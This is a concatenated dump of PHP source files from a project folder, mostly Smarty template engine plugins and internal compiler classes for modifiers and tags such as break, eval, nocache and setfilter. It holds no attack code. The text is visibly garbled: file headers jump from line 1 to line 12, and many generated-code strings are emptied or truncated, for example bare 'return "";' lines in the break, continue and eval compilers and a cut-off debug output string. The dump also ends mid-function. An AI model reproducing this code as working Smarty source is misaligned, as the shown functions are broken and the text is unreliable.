13 | * Purpose: designate default value for empty variables 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.default.php default (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_default($params) 23 | { 24 | $output = $params[0]; 25 | if (!isset($params[1])) { 26 | $params[1] = "''"; 27 | } 28 | 29 | array_shift($params); 30 | foreach ($params as $param) { 31 | $output = '(($tmp = @' . $output . ')===null||$tmp===\'\' ? ' . $param . ' : $tmp)'; 32 | } 33 | 34 | return $output; 35 | } 36 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.from_charset.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: from_charset
13 | * Purpose: convert character encoding from $charset to internal encoding 14 | * 15 | * @author Rodney Rehm 16 | * 17 | * @param array $params parameters 18 | * 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_from_charset($params) 22 | { 23 | if (!Smarty::$_MBSTRING) { 24 | // FIXME: (rodneyrehm) shouldn't this throw an error? 25 | return $params[0]; 26 | } 27 | 28 | if (!isset($params[1])) { 29 | $params[1] = '"ISO-8859-1"'; 30 | } 31 | 32 | return 'mb_convert_encoding(' . $params[0] . ', "' . addslashes(Smarty::$_CHARSET) . '", ' . $params[1] . ')'; 33 | } 34 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.indent.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: indent
13 | * Purpose: indent lines of text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.indent.php indent (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | 23 | function smarty_modifiercompiler_indent($params) 24 | { 25 | if (!isset($params[1])) { 26 | $params[1] = 4; 27 | } 28 | if (!isset($params[2])) { 29 | $params[2] = "' '"; 30 | } 31 | 32 | return 'preg_replace(\'!^!m\',str_repeat(' . $params[2] . ',' . $params[1] . '),' . $params[0] . ')'; 33 | } 34 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.lower.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: lower
13 | * Purpose: convert string to lowercase 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.lower.php lower (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @author Uwe Tews 18 | * 19 | * @param array $params parameters 20 | * 21 | * @return string with compiled code 22 | */ 23 | 24 | function smarty_modifiercompiler_lower($params) 25 | { 26 | if (Smarty::$_MBSTRING) { 27 | return 'mb_strtolower(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')'; 28 | } 29 | // no MBString fallback 30 | return 'strtolower(' . $params[0] . ')'; 31 | } 32 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.noprint.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: noprint
13 | * Purpose: return an empty string 14 | * 15 | * @author Uwe Tews 16 | * @return string with compiled code 17 | */ 18 | function smarty_modifiercompiler_noprint() 19 | { 20 | return "''"; 21 | } 22 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.string_format.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: string_format
13 | * Purpose: format strings via sprintf 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.string.format.php string_format (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_string_format($params) 23 | { 24 | return 'sprintf(' . $params[1] . ',' . $params[0] . ')'; 25 | } 26 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.strip.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: strip
13 | * Purpose: Replace all repeated spaces, newlines, tabs 14 | * with a single space or supplied replacement string.
15 | * Example: {$var|strip} {$var|strip:" "}
16 | * Date: September 25th, 2002 17 | * 18 | * @link http://www.smarty.net/manual/en/language.modifier.strip.php strip (Smarty online manual) 19 | * @author Uwe Tews 20 | * 21 | * @param array $params parameters 22 | * 23 | * @return string with compiled code 24 | */ 25 | 26 | function smarty_modifiercompiler_strip($params) 27 | { 28 | if (!isset($params[1])) { 29 | $params[1] = "' '"; 30 | } 31 | 32 | return "preg_replace('!\s+!" . Smarty::$_UTF8_MODIFIER . "', {$params[1]},{$params[0]})"; 33 | } 34 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.strip_tags.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: strip_tags
13 | * Purpose: strip html tags from text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.strip.tags.php strip_tags (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_strip_tags($params) 23 | { 24 | if (!isset($params[1]) || $params[1] === true || trim($params[1], '"') == 'true') { 25 | return "preg_replace('!<[^>]*?>!', ' ', {$params[0]})"; 26 | } else { 27 | return 'strip_tags(' . $params[0] . ')'; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.to_charset.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: to_charset
13 | * Purpose: convert character encoding from internal encoding to $charset 14 | * 15 | * @author Rodney Rehm 16 | * 17 | * @param array $params parameters 18 | * 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_to_charset($params) 22 | { 23 | if (!Smarty::$_MBSTRING) { 24 | // FIXME: (rodneyrehm) shouldn't this throw an error? 25 | return $params[0]; 26 | } 27 | 28 | if (!isset($params[1])) { 29 | $params[1] = '"ISO-8859-1"'; 30 | } 31 | 32 | return 'mb_convert_encoding(' . $params[0] . ', ' . $params[1] . ', "' . addslashes(Smarty::$_CHARSET) . '")'; 33 | } 34 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.unescape.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: unescape
13 | * Purpose: unescape html entities 14 | * 15 | * @author Rodney Rehm 16 | * 17 | * @param array $params parameters 18 | * 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_unescape($params) 22 | { 23 | if (!isset($params[1])) { 24 | $params[1] = 'html'; 25 | } 26 | if (!isset($params[2])) { 27 | $params[2] = '\'' . addslashes(Smarty::$_CHARSET) . '\''; 28 | } else { 29 | $params[2] = "'" . $params[2] . "'"; 30 | } 31 | 32 | switch (trim($params[1], '"\'')) { 33 | case 'entity': 34 | case 'htmlall': 35 | if (Smarty::$_MBSTRING) { 36 | return 'mb_convert_encoding(' . $params[0] . ', ' . $params[2] . ', \'HTML-ENTITIES\')'; 37 | } 38 | 39 | return 'html_entity_decode(' . $params[0] . ', ENT_NOQUOTES, ' . $params[2] . ')'; 40 | 41 | case 'html': 42 | return 'htmlspecialchars_decode(' . $params[0] . ', ENT_QUOTES)'; 43 | 44 | case 'url': 45 | return 'rawurldecode(' . $params[0] . ')'; 46 | 47 | default: 48 | return $params[0]; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.upper.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: lower
13 | * Purpose: convert string to uppercase 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.upper.php lower (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_upper($params) 23 | { 24 | if (Smarty::$_MBSTRING) { 25 | return 'mb_strtoupper(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')'; 26 | } 27 | // no MBString fallback 28 | return 'strtoupper(' . $params[0] . ')'; 29 | } 30 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.wordwrap.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: wordwrap
13 | * Purpose: wrap a string of text at a given length 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * @param $compiler 20 | * 21 | * @return string with compiled code 22 | */ 23 | function smarty_modifiercompiler_wordwrap($params, $compiler) 24 | { 25 | if (!isset($params[1])) { 26 | $params[1] = 80; 27 | } 28 | if (!isset($params[2])) { 29 | $params[2] = '"\n"'; 30 | } 31 | if (!isset($params[3])) { 32 | $params[3] = 'false'; 33 | } 34 | $function = 'wordwrap'; 35 | if (Smarty::$_MBSTRING) { 36 | if ($compiler->template->caching && ($compiler->tag_nocache | $compiler->nocache)) { 37 | $compiler->template->required_plugins['nocache']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR . 'shared.mb_wordwrap.php'; 38 | $compiler->template->required_plugins['nocache']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap'; 39 | } else { 40 | $compiler->template->required_plugins['compiled']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR . 'shared.mb_wordwrap.php'; 41 | $compiler->template->required_plugins['compiled']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap'; 42 | } 43 | $function = 'smarty_mb_wordwrap'; 44 | } 45 | 46 | return $function . '(' . $params[0] . ',' . $params[1] . ',' . $params[2] . ',' . $params[3] . ')'; 47 | } 48 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/shared.escape_special_chars.php: -------------------------------------------------------------------------------- 1 | =')) { 10 | /** 11 | * escape_special_chars common function 12 | * Function: smarty_function_escape_special_chars
13 | * Purpose: used by other smarty functions to escape 14 | * special chars except for already escaped ones 15 | * 16 | * @author Monte Ohrt 17 | * 18 | * @param string $string text that should by escaped 19 | * 20 | * @return string 21 | */ 22 | function smarty_function_escape_special_chars($string) 23 | { 24 | if (!is_array($string)) { 25 | $string = htmlspecialchars($string, ENT_COMPAT, Smarty::$_CHARSET, false); 26 | } 27 | 28 | return $string; 29 | } 30 | } else { 31 | /** 32 | * escape_special_chars common function 33 | * Function: smarty_function_escape_special_chars
34 | * Purpose: used by other smarty functions to escape 35 | * special chars except for already escaped ones 36 | * 37 | * @author Monte Ohrt 38 | * 39 | * @param string $string text that should by escaped 40 | * 41 | * @return string 42 | */ 43 | function smarty_function_escape_special_chars($string) 44 | { 45 | if (!is_array($string)) { 46 | $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); 47 | $string = htmlspecialchars($string); 48 | $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); 49 | } 50 | 51 | return $string; 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/shared.literal_compiler_param.php: -------------------------------------------------------------------------------- 1 | 11 | * Purpose: used by other smarty functions to make a timestamp from a string. 12 | * 13 | * @author Monte Ohrt 14 | * 15 | * @param DateTime|int|string $string date object, timestamp or string that can be converted using strtotime() 16 | * 17 | * @return int 18 | */ 19 | function smarty_make_timestamp($string) 20 | { 21 | if (empty($string)) { 22 | // use "now": 23 | return time(); 24 | } elseif ($string instanceof DateTime) { 25 | return $string->getTimestamp(); 26 | } elseif (strlen($string) == 14 && ctype_digit($string)) { 27 | // it is mysql timestamp format of YYYYMMDDHHMMSS? 28 | return mktime(substr($string, 8, 2), substr($string, 10, 2), substr($string, 12, 2), 29 | substr($string, 4, 2), substr($string, 6, 2), substr($string, 0, 4)); 30 | } elseif (is_numeric($string)) { 31 | // it is a numeric string, we handle it as timestamp 32 | return (int) $string; 33 | } else { 34 | // strtotime should handle it 35 | $time = strtotime($string); 36 | if ($time == - 1 || $time === false) { 37 | // strtotime() was not able to parse $string, use "now": 38 | return time(); 39 | } 40 | 41 | return $time; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/shared.mb_str_replace.php: -------------------------------------------------------------------------------- 1 | $width) { 37 | if ($cut) { 38 | $_tokens = preg_split('!(.{' . $width . '})!S' . Smarty::$_UTF8_MODIFIER, $_token, - 1, PREG_SPLIT_NO_EMPTY + PREG_SPLIT_DELIM_CAPTURE); 39 | } 40 | } 41 | 42 | foreach ($_tokens as $token) { 43 | $_space = !!preg_match('!^\s$!S' . Smarty::$_UTF8_MODIFIER, $token); 44 | $token_length = mb_strlen($token, Smarty::$_CHARSET); 45 | $length += $token_length; 46 | 47 | if ($length > $width) { 48 | // remove space before inserted break 49 | if ($_previous) { 50 | $t = mb_substr($t, 0, - 1, Smarty::$_CHARSET); 51 | } 52 | 53 | if (!$_space) { 54 | // add the break before the token 55 | if (!empty($t)) { 56 | $t .= $break; 57 | } 58 | $length = $token_length; 59 | } 60 | } elseif ($token == "\n") { 61 | // hard break must reset counters 62 | $_previous = 0; 63 | $length = 0; 64 | } 65 | $_previous = $_space; 66 | // add the token 67 | $t .= $token; 68 | } 69 | } 70 | 71 | return $t; 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/variablefilter.htmlspecialchars.php: -------------------------------------------------------------------------------- 1 | dataObjectName = 'Data_object ' . (isset($name) ? "'{$name}'" : self::$count); 53 | $this->smarty = $smarty; 54 | if (is_object($_parent)) { 55 | // when object set up back pointer 56 | $this->parent = $_parent; 57 | } elseif (is_array($_parent)) { 58 | // set up variable values 59 | foreach ($_parent as $_key => $_val) { 60 | $this->tpl_vars[$_key] = new Smarty_Variable($_val); 61 | } 62 | } elseif ($_parent != null) { 63 | throw new SmartyException("Wrong type for template variables"); 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_append.php: -------------------------------------------------------------------------------- 1 | required_attributes = array('var', 'value'); 32 | $this->shorttag_order = array('var', 'value'); 33 | $this->optional_attributes = array('scope', 'index'); 34 | // check and get attributes 35 | $_attr = $this->getAttributes($compiler, $args); 36 | // map to compile assign attributes 37 | if (isset($_attr['index'])) { 38 | $_params['smarty_internal_index'] = '[' . $_attr['index'] . ']'; 39 | unset($_attr['index']); 40 | } else { 41 | $_params['smarty_internal_index'] = '[]'; 42 | } 43 | $_new_attr = array(); 44 | foreach ($_attr as $key => $value) { 45 | $_new_attr[] = array($key => $value); 46 | } 47 | // call compile assign 48 | return parent::compile($_new_attr, $compiler, $_params); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_break.php: -------------------------------------------------------------------------------- 1 | true, 'foreach' => true, 'while' => true, 'section' => true); 46 | // check and get attributes 47 | $_attr = $this->getAttributes($compiler, $args); 48 | 49 | if ($_attr['nocache'] === true) { 50 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 51 | } 52 | 53 | if (isset($_attr['levels'])) { 54 | if (!is_numeric($_attr['levels'])) { 55 | $compiler->trigger_template_error('level attribute must be a numeric constant', $compiler->lex->taglineno); 56 | } 57 | $_levels = $_attr['levels']; 58 | } else { 59 | $_levels = 1; 60 | } 61 | $level_count = $_levels; 62 | $stack_count = count($compiler->_tag_stack) - 1; 63 | while ($level_count > 0 && $stack_count >= 0) { 64 | if (isset($_is_loopy[$compiler->_tag_stack[$stack_count][0]])) { 65 | $level_count --; 66 | } 67 | $stack_count --; 68 | } 69 | if ($level_count != 0) { 70 | $compiler->trigger_template_error("cannot break {$_levels} level(s)", $compiler->lex->taglineno); 71 | } 72 | 73 | return ""; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_config_load.php: -------------------------------------------------------------------------------- 1 | true, 'parent' => true, 'root' => true, 'global' => true); 52 | // check and get attributes 53 | $_attr = $this->getAttributes($compiler, $args); 54 | 55 | if ($_attr['nocache'] === true) { 56 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 57 | } 58 | 59 | // save possible attributes 60 | $conf_file = $_attr['file']; 61 | if (isset($_attr['section'])) { 62 | $section = $_attr['section']; 63 | } else { 64 | $section = 'null'; 65 | } 66 | $scope = 'local'; 67 | // scope setup 68 | if (isset($_attr['scope'])) { 69 | $_attr['scope'] = trim($_attr['scope'], "'\""); 70 | if (isset($_is_legal_scope[$_attr['scope']])) { 71 | $scope = $_attr['scope']; 72 | } else { 73 | $compiler->trigger_template_error('illegal value for "scope" attribute', $compiler->lex->taglineno); 74 | } 75 | } 76 | // create config object 77 | $_output = ""; 78 | 79 | return $_output; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_continue.php: -------------------------------------------------------------------------------- 1 | true, 'foreach' => true, 'while' => true, 'section' => true); 46 | // check and get attributes 47 | $_attr = $this->getAttributes($compiler, $args); 48 | 49 | if ($_attr['nocache'] === true) { 50 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 51 | } 52 | 53 | if (isset($_attr['levels'])) { 54 | if (!is_numeric($_attr['levels'])) { 55 | $compiler->trigger_template_error('level attribute must be a numeric constant', $compiler->lex->taglineno); 56 | } 57 | $_levels = $_attr['levels']; 58 | } else { 59 | $_levels = 1; 60 | } 61 | $level_count = $_levels; 62 | $stack_count = count($compiler->_tag_stack) - 1; 63 | while ($level_count > 0 && $stack_count >= 0) { 64 | if (isset($_is_loopy[$compiler->_tag_stack[$stack_count][0]])) { 65 | $level_count --; 66 | } 67 | $stack_count --; 68 | } 69 | if ($level_count != 0) { 70 | $compiler->trigger_template_error("cannot continue {$_levels} level(s)", $compiler->lex->taglineno); 71 | } 72 | 73 | return ""; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_debug.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 32 | 33 | // compile always as nocache 34 | $compiler->tag_nocache = true; 35 | 36 | // display debug template 37 | $_output = "smarty->loadPlugin('Smarty_Internal_Debug'); Smarty_Internal_Debug::display_debug(\$_smarty_tpl); ?>"; 38 | 39 | return $_output; 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_eval.php: -------------------------------------------------------------------------------- 1 | required_attributes = array('var'); 52 | $this->optional_attributes = array('assign'); 53 | // check and get attributes 54 | $_attr = $this->getAttributes($compiler, $args); 55 | if (isset($_attr['assign'])) { 56 | // output will be stored in a smarty variable instead of being displayed 57 | $_assign = $_attr['assign']; 58 | } 59 | 60 | // create template object 61 | $_output = "\$_template = new {$compiler->smarty->template_class}('eval:'." . $_attr['var'] . ", \$_smarty_tpl->smarty, \$_smarty_tpl);"; 62 | //was there an assign attribute? 63 | if (isset($_assign)) { 64 | $_output .= "\$_smarty_tpl->assign($_assign,\$_template->fetch());"; 65 | } else { 66 | $_output .= "echo \$_template->fetch();"; 67 | } 68 | 69 | return ""; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_ldelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | 37 | return $compiler->smarty->left_delimiter; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_nocache.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 38 | $this->openTag($compiler, 'nocache', array($compiler->nocache)); 39 | // enter nocache mode 40 | $compiler->nocache = true; 41 | // this tag does not return compiled code 42 | $compiler->has_code = false; 43 | 44 | return true; 45 | } 46 | } 47 | 48 | /** 49 | * Smarty Internal Plugin Compile Nocacheclose Class 50 | * 51 | * @package Smarty 52 | * @subpackage Compiler 53 | */ 54 | class Smarty_Internal_Compile_Nocacheclose extends Smarty_Internal_CompileBase 55 | { 56 | /** 57 | * Compiles code for the {/nocache} tag 58 | * This tag does not generate compiled output. It only sets a compiler flag. 59 | * 60 | * @param array $args array with attributes from parser 61 | * @param object $compiler compiler object 62 | * 63 | * @return bool 64 | */ 65 | public function compile($args, $compiler) 66 | { 67 | $_attr = $this->getAttributes($compiler, $args); 68 | // leave nocache mode 69 | list($compiler->nocache) = $this->closeTag($compiler, array('nocache')); 70 | // this tag does not return compiled code 71 | $compiler->has_code = false; 72 | 73 | return true; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_private_function_plugin.php: -------------------------------------------------------------------------------- 1 | has_output = true; 49 | 50 | // check and get attributes 51 | $_attr = $this->getAttributes($compiler, $args); 52 | if ($_attr['nocache'] === true) { 53 | $compiler->tag_nocache = true; 54 | } 55 | unset($_attr['nocache']); 56 | // convert attributes into parameter array string 57 | $_paramsArray = array(); 58 | foreach ($_attr as $_key => $_value) { 59 | if (is_int($_key)) { 60 | $_paramsArray[] = "$_key=>$_value"; 61 | } else { 62 | $_paramsArray[] = "'$_key'=>$_value"; 63 | } 64 | } 65 | $_params = 'array(' . implode(",", $_paramsArray) . ')'; 66 | // compile code 67 | $output = "\n"; 68 | 69 | return $output; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_rdelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | 37 | return $compiler->smarty->right_delimiter; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_setfilter.php: -------------------------------------------------------------------------------- 1 | variable_filter_stack[] = $compiler->template->variable_filters; 31 | $compiler->template->variable_filters = $parameter['modifier_list']; 32 | // this tag does not return compiled code 33 | $compiler->has_code = false; 34 | 35 | return true; 36 | } 37 | } 38 | 39 | /** 40 | * Smarty Internal Plugin Compile Setfilterclose Class 41 | * 42 | * @package Smarty 43 | * @subpackage Compiler 44 | */ 45 | class Smarty_Internal_Compile_Setfilterclose extends Smarty_Internal_CompileBase 46 | { 47 | /** 48 | * Compiles code for the {/setfilter} tag 49 | * This tag does not generate compiled output. It resets variable filter. 50 | * 51 | * @param array $args array with attributes from parser 52 | * @param object $compiler compiler object 53 | * 54 | * @return string compiled code 55 | */ 56 | public function compile($args, $compiler) 57 | { 58 | $_attr = $this->getAttributes($compiler, $args); 59 | // reset variable filter to previous state 60 | if (count($compiler->variable_filter_stack)) { 61 | $compiler->template->variable_filters = array_pop($compiler->variable_filter_stack); 62 | } else { 63 | $compiler->template->variable_filters = array(); 64 | } 65 | // this tag does not return compiled code 66 | $compiler->has_code = false; 67 | 68 | return true; 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_extension_defaulttemplatehandler.php: -------------------------------------------------------------------------------- 1 | isConfig) { 30 | $default_handler = $_template->smarty->default_config_handler_func; 31 | } else { 32 | $default_handler = $_template->smarty->default_template_handler_func; 33 | } 34 | $_content = $_timestamp = null; 35 | $_return = call_user_func_array($default_handler, 36 | array($source->type, $source->name, &$_content, &$_timestamp, $source->smarty)); 37 | if (is_string($_return)) { 38 | $source->exists = is_file($_return); 39 | if ($source->exists) { 40 | $source->timestamp = filemtime($_return); 41 | } 42 | $source->filepath = $_return; 43 | } elseif ($_return === true) { 44 | $source->content = $_content; 45 | $source->timestamp = $_timestamp; 46 | $source->exists = true; 47 | $source->recompiled = true; 48 | $source->filepath = false; 49 | } 50 | } 51 | 52 | /** 53 | * register template default handler 54 | * 55 | * @param Smarty $smarty 56 | * @param mixed $callback 57 | * 58 | * @throws SmartyException 59 | */ 60 | static function registerDefaultTemplateHandler(Smarty $smarty, $callback) 61 | { 62 | if (is_callable($callback)) { 63 | $smarty->default_template_handler_func = $callback; 64 | } else { 65 | throw new SmartyException("Default template handler not callable"); 66 | } 67 | } 68 | 69 | /** 70 | * register config default handler 71 | * 72 | * @param Smarty $smarty 73 | * @param mixed $callback 74 | * 75 | * @throws SmartyException 76 | */ 77 | static function registerDefaultConfigHandler(Smarty $smarty, $callback) 78 | { 79 | if (is_callable($callback)) { 80 | $smarty->default_config_handler_func = $callback; 81 | } else { 82 | throw new SmartyException("Default config handler not callable"); 83 | } 84 | } 85 | } -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_filter_handler.php: -------------------------------------------------------------------------------- 1 | smarty->autoload_filters[$type])) { 38 | foreach ((array) $template->smarty->autoload_filters[$type] as $name) { 39 | $plugin_name = "Smarty_{$type}filter_{$name}"; 40 | if ($template->smarty->loadPlugin($plugin_name)) { 41 | if (function_exists($plugin_name)) { 42 | // use loaded Smarty2 style plugin 43 | $output = $plugin_name($output, $template); 44 | } elseif (class_exists($plugin_name, false)) { 45 | // loaded class of filter plugin 46 | $output = call_user_func(array($plugin_name, 'execute'), $output, $template); 47 | } 48 | } else { 49 | // nothing found, throw exception 50 | throw new SmartyException("Unable to load filter {$plugin_name}"); 51 | } 52 | } 53 | } 54 | // loop over registerd filters of specified type 55 | if (!empty($template->smarty->registered_filters[$type])) { 56 | foreach ($template->smarty->registered_filters[$type] as $key => $name) { 57 | if (is_array($template->smarty->registered_filters[$type][$key])) { 58 | $output = call_user_func($template->smarty->registered_filters[$type][$key], $output, $template); 59 | } else { 60 | $output = $template->smarty->registered_filters[$type][$key]($output, $template); 61 | } 62 | } 63 | } 64 | // return filtered output 65 | return $output; 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_get_include_path.php: -------------------------------------------------------------------------------- 1 | assign('{$_assign}' , {$_function} (" . var_export($_attr, true) . ",\$_smarty_tpl), true);?>"; 41 | } else { 42 | $_output .= "echo {$_function}(" . var_export($_attr, true) . ",\$_smarty_tpl);?>"; 43 | } 44 | $_tpl = $_template; 45 | while ($_tpl->parent instanceof Smarty_Internal_Template) { 46 | $_tpl = $_tpl->parent; 47 | } 48 | 49 | return "/*%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/" . $_output . "/*/%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/"; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 30 | $this->data = $data; 31 | } 32 | 33 | /** 34 | * Return buffer content in parentheses 35 | * 36 | * @return string content 37 | */ 38 | public function to_smarty_php() 39 | { 40 | return sprintf("(%s)", $this->data); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_dqcontent.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 30 | $this->data = $data; 31 | } 32 | 33 | /** 34 | * Return content as double quoted string 35 | * 36 | * @return string doubled quoted string 37 | */ 38 | public function to_smarty_php() 39 | { 40 | return '"' . $this->data . '"'; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_tag.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 38 | $this->data = $data; 39 | $this->saved_block_nesting = $parser->block_nesting_level; 40 | } 41 | 42 | /** 43 | * Return buffer content 44 | * 45 | * @return string content 46 | */ 47 | public function to_smarty_php() 48 | { 49 | return $this->data; 50 | } 51 | 52 | /** 53 | * Return complied code that loads the evaluated output of buffer content into a temporary variable 54 | * 55 | * @return string template code 56 | */ 57 | public function assign_to_var() 58 | { 59 | $var = sprintf('$_tmp%d', ++ Smarty_Internal_Templateparser::$prefix_number); 60 | $tmp = $this->parser->compiler->appendCode('', $this->data); 61 | $tmp = $this->parser->compiler->appendCode($tmp, ""); 62 | $this->parser->compiler->prefix_code[] = sprintf("%s", $tmp); 63 | 64 | return $var; 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_parsetree_text.php: -------------------------------------------------------------------------------- 1 | parser = $parser; 28 | $this->data = $data; 29 | } 30 | 31 | /** 32 | * Return buffer content 33 | * 34 | * @return string text 35 | */ 36 | public function to_smarty_php() 37 | { 38 | return $this->data; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_resource_stream.php: -------------------------------------------------------------------------------- 1 | resource, '://') !== false) { 33 | $source->filepath = $source->resource; 34 | } else { 35 | $source->filepath = str_replace(':', '://', $source->resource); 36 | } 37 | $source->uid = false; 38 | $source->content = $this->getContent($source); 39 | $source->timestamp = false; 40 | $source->exists = !!$source->content; 41 | } 42 | 43 | /** 44 | * Load template's source from stream into current template object 45 | * 46 | * @param Smarty_Template_Source $source source object 47 | * 48 | * @return string template source 49 | * @throws SmartyException if source cannot be loaded 50 | */ 51 | public function getContent(Smarty_Template_Source $source) 52 | { 53 | $t = ''; 54 | // the availability of the stream has already been checked in Smarty_Resource::fetch() 55 | $fp = fopen($source->filepath, 'r+'); 56 | if ($fp) { 57 | while (!feof($fp) && ($current_line = fgets($fp)) !== false) { 58 | $t .= $current_line; 59 | } 60 | fclose($fp); 61 | 62 | return $t; 63 | } else { 64 | return false; 